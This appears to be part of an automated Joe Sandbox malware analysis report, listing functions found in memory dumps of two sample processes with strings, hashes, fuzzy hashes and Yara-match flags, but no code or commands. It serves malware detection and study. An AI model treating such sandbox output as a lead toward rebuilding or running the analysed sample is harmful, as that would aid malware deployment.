                                  Function 00E43DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: b4c903dcb3c30c62c4ce6276466229697507b5734daa612b5f3305a925c7ef15
                                  • Instruction ID: 10d547e7bb331315a34b11de2a141184f2efdae5245bd2de2604dd37c31c5fa6
                                  • Opcode Fuzzy Hash: b4c903dcb3c30c62c4ce6276466229697507b5734daa612b5f3305a925c7ef15
                                  • Instruction Fuzzy Hash: 9F21AFB2A0121AABCB20AE79AC459EF77ACEB55718F041525FC08B3141E7709F58C7E1
                                  Function 00DC53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E022F4
                                  Strings
                                  • RTL: Resource at %p, xrefs: 00E0230B
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00E022FC
                                  • RTL: Re-Waiting, xrefs: 00E02328
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-871070163
                                  • Opcode ID: 796f3a74c643591ad4035059d077af1730ea21a7de3465d6782d54e06cf2197f
                                  • Instruction ID: 24bcea89298969b9dfd959166129873bd690f8d40eea0f07b48e9fb70fd1960f
                                  • Opcode Fuzzy Hash: 796f3a74c643591ad4035059d077af1730ea21a7de3465d6782d54e06cf2197f
                                  • Instruction Fuzzy Hash: 9F5136716006426BDF11AB64DC85FA673E8EF58364F11422DFE08DB281EA65EC818BB0
                                  Function 00DCEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00E0248D
                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00E024BD
                                  • RTL: Re-Waiting, xrefs: 00E024FA
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                  • API String ID: 0-3177188983
                                  • Opcode ID: 005f61e4ac8b542cce2a63dfbb22c8572b634a3a9f0817744bed8b78a241a69e
                                  • Instruction ID: 71b48604daaef77f3b896b16334472a07b3dcd1c1ea252a6295b2c9dce36ef60
                                  • Opcode Fuzzy Hash: 005f61e4ac8b542cce2a63dfbb22c8572b634a3a9f0817744bed8b78a241a69e
                                  • Instruction Fuzzy Hash: 3D41E8B0600205AFDB20EB68CD89F6A77F9EF45720F208609F665EB2C1D774E9418771
                                  Function 00E1E759 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: _wcstoul
                                  • String ID: 8$8$Set 0x%X protection for %p section for %d bytes, old protection 0x%X
                                  • API String ID: 1097018459-1135715592
                                  • Opcode ID: d515701828f7bb21af964c1ca10dcc5c780c7c690f0cff6a729f0d3178a7f158
                                  • Instruction ID: 8f5e62239e1f5f82221d4c5c45caaeb158973452630c8988d380c0298c4533ea
                                  • Opcode Fuzzy Hash: d515701828f7bb21af964c1ca10dcc5c780c7c690f0cff6a729f0d3178a7f158
                                  • Instruction Fuzzy Hash: 8B419F72C00249AADF149FE4C881BEEB7B8EF05314F58946AF911B7281E774DAC4D760
                                  Function 00DDFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID:
                                  • API String ID: 3965848254-0
                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction ID: f472ce2a71fb4ae1cbaa3c5aec6204eedea3a9e6042578ee6cc8bea08296af54
                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction Fuzzy Hash: 0A91A231D0024AEFDF24DF58C8456EEB7B5EF55314F24847BE442A6392E7309A81DBA1
                                  Function 00E55CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: $$0
                                  • API String ID: 1302938615-389342756
                                  • Opcode ID: 0ef47804c64e88a5c6d8e6d79971724237a672521e52c435f275fd8d55594eb9
                                  • Instruction ID: 506dff893e017a8e92a7bc33ee5c0fdd4c59a00944227e36b17fa8aec2913bb8
                                  • Opcode Fuzzy Hash: 0ef47804c64e88a5c6d8e6d79971724237a672521e52c435f275fd8d55594eb9
                                  • Instruction Fuzzy Hash: D291B132D04A8ADFDF24CF99C8653EEBBB0AF01316F14695ADCA1B7291C7744A49CB50

                                  Executed Functions

                                  Function 00CC2EE4 Relevance: 30.5, Strings: 24, Instructions: 476COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !$($.$1E$8Y$9m$?/$Am$J$J<$K$RA$Tj$X$]/$`$`q$a:$lv$n($r.$z$|$Z
                                  • API String ID: 0-3335427861
                                  • Opcode ID: 277da993c6968e9ca5d82dc8bea2544657d17a76410fcaffc1162f2cf9e36fe8
                                  • Instruction ID: 18b69193a0c8e42c92618d4e54fe90c2eefc860163d10516d30b6d1888025c05
                                  • Opcode Fuzzy Hash: 277da993c6968e9ca5d82dc8bea2544657d17a76410fcaffc1162f2cf9e36fe8
                                  • Instruction Fuzzy Hash: 7D42AEB0D05268CBEB28CF49D994BEDBBB2BB45308F2081D9D4496B290C7B55F89DF44
                                  Function 00CD0533 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6$O$S$\$s
                                  • API String ID: 0-3854637164
                                  • Opcode ID: 7a7d43efcca7597bcf8a6a47de1546d17a73c93f829adfa4eb7c1671c89dc7bb
                                  • Instruction ID: 9c5c4d0b38ec5ba78068ce1958b406ca420bec5572920a71112917ea1e42a0f5
                                  • Opcode Fuzzy Hash: 7a7d43efcca7597bcf8a6a47de1546d17a73c93f829adfa4eb7c1671c89dc7bb
                                  • Instruction Fuzzy Hash: A841C6B2D00219BBDB10EB95DC45FEEB3BCEB48310F14419AFE1897241E771AA548BE1
                                  Function 00CDCE78 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1@$CO
                                  • API String ID: 0-3271856365
                                  • Opcode ID: d5367fcadc0c0237eb455368ab32a8165f941f740ed9f59757560cf1061dbf00
                                  • Instruction ID: 156d24768c10b333ae77e72d153f5868a7fe0936f46463ef3a24b4187065e6d8
                                  • Opcode Fuzzy Hash: d5367fcadc0c0237eb455368ab32a8165f941f740ed9f59757560cf1061dbf00
                                  • Instruction Fuzzy Hash: 77111CB6D01219AF9B00DFE9D8419EFBBF9EF88710F10416BE915E7200E7705A04CBA1
                                  Function 00CDCDE8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <*
                                  • API String ID: 0-3918635734
                                  • Opcode ID: 5d3ea86b4cf73581d14e47e169f14b5317848a2948dffec33904616e0e6b2216
                                  • Instruction ID: b6ae43be0a274af83a06f3800006115967ef5f8f2a011a3a9e05a883484f1246
                                  • Opcode Fuzzy Hash: 5d3ea86b4cf73581d14e47e169f14b5317848a2948dffec33904616e0e6b2216
                                  • Instruction Fuzzy Hash: 3301D7F2D01219AF9B40DFE8C9419EEBBF9AB18700F14466AE915F3241EB705A04CBA5
                                  Function 00CBB279 Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 55abe421ca3e5b0d78425a0224a921fbeb1cf440639fee9db3fffa6466aa7fc5
                                  • Instruction ID: 36b9a0581c2803971a49bbf67e5c1560f6fd49ed1da014ec21eaa49a95d6b588
                                  • Opcode Fuzzy Hash: 55abe421ca3e5b0d78425a0224a921fbeb1cf440639fee9db3fffa6466aa7fc5
                                  • Instruction Fuzzy Hash: FF4130B1D11218AFDB04CF99C885AEEBBBCFF49710F50415EFA18E6241D3B09A41CBA4
                                  Function 00CDFAB8 Relevance: .1, Instructions: 83COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f820e85ee7799ced374d5f228edee973b11cb4d80d86b2547316a7fa5b2d660a
                                  • Instruction ID: e494aa6742039394546b2d8ba70f59c3a44fe07cb2c0b7cccfc338f48e417958
                                  • Opcode Fuzzy Hash: f820e85ee7799ced374d5f228edee973b11cb4d80d86b2547316a7fa5b2d660a
                                  • Instruction Fuzzy Hash: 3321DFB2200549BBCB14DF99DC81EEB73ADEF8C714F118209FA18A3241D630E8528BA4
                                  Function 00CD0378 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c8fba3aa02b4688b8ad44cf887169cd798488221683baca2bc6745e7b2def8e
                                  • Instruction ID: e2e95ad24c095e33e17ce409435049c1665121850b40e28f084a8a0c96cc7b3e
                                  • Opcode Fuzzy Hash: 9c8fba3aa02b4688b8ad44cf887169cd798488221683baca2bc6745e7b2def8e
                                  • Instruction Fuzzy Hash: F81186B63802097BF7209A559C43FAB375C9B85B11F24401AFB04BA2C2D6F5B81197B4
                                  Function 00CDFA08 Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5167dea811e553904f14d2d5ac7bceb04798e75c958732051781d2d0ce5dcd43
                                  • Instruction ID: b51e0c5a36b8cf3506ee59f43363646e82eff512da7c6d02eb8f5b9f9e325599
                                  • Opcode Fuzzy Hash: 5167dea811e553904f14d2d5ac7bceb04798e75c958732051781d2d0ce5dcd43
                                  • Instruction Fuzzy Hash: 171112B2200209AFDB14EF99DC81EEB73EDEF8C700F108109FA18A3241D634A9118BB4
                                  Function 00CE0218 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 65ec8470de90f2218b0995cd8d15330cebc4bdeb74493bfa14f8b7e3c0dd4b29
                                  • Instruction ID: 39cdf7dfae7dbffdf37b261da0a63e1cf68581529e58ec8151bae90ce8dfbebe
                                  • Opcode Fuzzy Hash: 65ec8470de90f2218b0995cd8d15330cebc4bdeb74493bfa14f8b7e3c0dd4b29
                                  • Instruction Fuzzy Hash: 811148B2600205BBDB14EEA9DC81EAF73ACEFC9710F144509FE18A7241D630B821CBB5
                                  Function 00CDE0A8 Relevance: .1, Instructions: 60COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41efd349507ca443c98136bd909d1596f47bb243703502aeac21759b178523d6
                                  • Instruction ID: 49c981843fb15afa3a4368a71e4806833b4335dc28f8ff24878b3b888e2b7dda
                                  • Opcode Fuzzy Hash: 41efd349507ca443c98136bd909d1596f47bb243703502aeac21759b178523d6
                                  • Instruction Fuzzy Hash: 9411D0B6D0121DAF9B00DFE9DC419EEB7FCEF49310F4445AAE919E7201E7709A058BA1
                                  Function 00CDF848 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 254f663172e94fa575cee9d54d6ea073f061fc0d9c0b3d3d5650422aa320e9c0
                                  • Instruction ID: 2735fb42100bf0b33a875c8f54dce497da86d7aabd4d8d4d7ffeb429d34afe73
                                  • Opcode Fuzzy Hash: 254f663172e94fa575cee9d54d6ea073f061fc0d9c0b3d3d5650422aa320e9c0
                                  • Instruction Fuzzy Hash: 4C0178B16006457BE714EA65DC82EAB73ACEFC6710F10481AFE18A7282D67079518BB2
                                  Function 00CDF728 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 89985d5a303442558f7cb02c5545045a8c7a40a761b062352d771fc7846300f0
                                  • Instruction ID: 2abdd2165ae06b6f287868627e0d15f095bba9886abd8375c7bd7241d0fc499a
                                  • Opcode Fuzzy Hash: 89985d5a303442558f7cb02c5545045a8c7a40a761b062352d771fc7846300f0
                                  • Instruction Fuzzy Hash: 980178B2240241BBE624EAA9DC46EEB73ACEFC6710F00440AFA18A7241D77079118BB4
                                  Function 00CE0518 Relevance: .0, Instructions: 47COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e01a2838f9e8af76457fa9588d2808d7ee8a70c659da85fe1ac773d7e48f191
                                  • Instruction ID: 6b94051a36b4c51bbe992600e91787ac01d47139fa045b50e61fee4c47506023
                                  • Opcode Fuzzy Hash: 3e01a2838f9e8af76457fa9588d2808d7ee8a70c659da85fe1ac773d7e48f191
                                  • Instruction Fuzzy Hash: E40180B2204549BBCB44DE99DC81EDB77ADAF8C714F518209BA0DA3241D670F8518BA4
                                  Function 00CBB3CF Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62d2f719afc77c98f415c78b6433e5154ecf834f6c66988360aeac5b7368e463
                                  • Instruction ID: 93b0aff8b657848b23e17d85ad717d1ff591b10f9fc60b0e0d8d40b508f52ed9
                                  • Opcode Fuzzy Hash: 62d2f719afc77c98f415c78b6433e5154ecf834f6c66988360aeac5b7368e463
                                  • Instruction Fuzzy Hash: 7DF0E9B360421627DB105A5EEC82BDAF7DCEB85374F640123FE188B251DB72D85286E0
                                  Function 00CDF918 Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24a72bd635d080b2c44781fc1dfe5a046bc9839d5fb7f5f73f78da25729e3851
                                  • Instruction ID: 7cd79d45d007926051f8aab5f392e0b3cb4e7c05ffe1830c8d07ac8516126319
                                  • Opcode Fuzzy Hash: 24a72bd635d080b2c44781fc1dfe5a046bc9839d5fb7f5f73f78da25729e3851
                                  • Instruction Fuzzy Hash: C8F01C752002057BC710EF99DC81E9F77ACEFC9710F108419FD08A7241D670B9118BB0
                                  Function 00CE0488 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                  • Instruction ID: eeda8e539ce7a13be20cb02f91a97d9b34921c1b3909de6dc8635cad60b78d1b
                                  • Opcode Fuzzy Hash: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                  • Instruction Fuzzy Hash: B9E012752442057BD714EE59DC42EDB77ACEFC5711F104419FD08A7242DA70B920CBB4
                                  Function 00CD0498 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 89be846e6acdb801e1e10d5853d14547c8bdb10b21dc0ccdd5e974bd5d6dd89b
                                  • Instruction ID: f80f9fc6881bf5086d96b3956a92890e8292845a14600ec9d3116dba49de06a4
                                  • Opcode Fuzzy Hash: 89be846e6acdb801e1e10d5853d14547c8bdb10b21dc0ccdd5e974bd5d6dd89b
                                  • Instruction Fuzzy Hash: 31F08271805208EBDB14CFA8D841BDDBBB4EB04320F20836EE9299B3C0D63497509781
                                  Function 00CE0438 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                  • Instruction ID: ded46f760c45af6e72aca0a1834d62e1780f1c6bf4686f6a3a4f88b33acb81e5
                                  • Opcode Fuzzy Hash: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                  • Instruction Fuzzy Hash: 31E09A71200205BFD714EE99DC41E9B37ACEFC9710F000419FD08A7242CA30BC108BB4
                                  Function 00CD0495 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 98c4fa78e606aaf1bde60ee5b23c48b9f6bf4e51fc476beab7521a3b3a5c58a9
                                  • Instruction ID: 30964a6f4ab3409e53abe56ec18a2302bbb5b7dcd23ed4570d2ab1f42916dbcc
                                  • Opcode Fuzzy Hash: 98c4fa78e606aaf1bde60ee5b23c48b9f6bf4e51fc476beab7521a3b3a5c58a9
                                  • Instruction Fuzzy Hash: 0AE06D71815108ABDB04CFA4D841BADBBA4EB04310F20836EFA19CB380D6398B509795
